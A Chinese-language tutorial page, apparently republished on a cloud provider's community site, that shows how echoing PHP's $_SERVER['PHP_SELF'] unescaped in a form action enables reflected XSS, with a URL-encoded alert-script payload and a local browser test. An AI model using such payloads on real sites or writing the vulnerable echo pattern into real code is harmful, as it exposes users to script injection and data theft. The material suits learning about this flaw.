如何利用$_SERVER["PHP_SELF"]變數植入script代碼?

來源:互聯網
上載者:User

標籤:定向   self   chrome   strong   變數   rac   har   apache伺服器   頁面   

假如我們是駭客,可以誘騙使用者訪問如下連結,

相當於使用者會在瀏覽器地址欄中輸入以下地址:

http://www.xxx.com/test_form.php/%22%3E%3Cscript%3Ealert(‘hacked‘)%3C/script%3E
這裡檔案名稱後的字元是URL encode characters,其等效於
<form method="post" action="test_form.php/"><script>alert(‘hacked‘)</script>

在這個頁面中我們設定一個表單,表單的設定如下:
<form method="post" action="<?php echo $_SERVER["PHP_SELF"];?>">

當使用者提交表單後(表單也可以為空白,這樣直接執行了),資料交給action指定的檔案也就是當前的分頁檔,並執行了後面的Javascript指令碼代碼(由browser自動執行)
<form method="post" action="test_form.php/"><script>alert(‘hacked‘)</script>

後面的指令碼任何JavaScript代碼可以添加在<script>標籤中! 駭客可以利用這點重新導向頁面到另外一台伺服器的頁面上,頁面 代碼檔案中可以保護惡意代碼,代碼可以修改全域變數或者擷取使用者的表單資料。

實際動手如下:我們編號含有以上要求的表單檔案在index.php中,本地訪問(已經搭好了apache伺服器)
http://localhost/phptest/index.php/%22%3E%3Cscript%3Ealert(‘hacked‘)%3C/script%3E

在Edge中效果:

然後顯示:

 

在chrome中效果


 

 
 

如何利用$_SERVER["PHP_SELF"]變數植入script代碼?

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.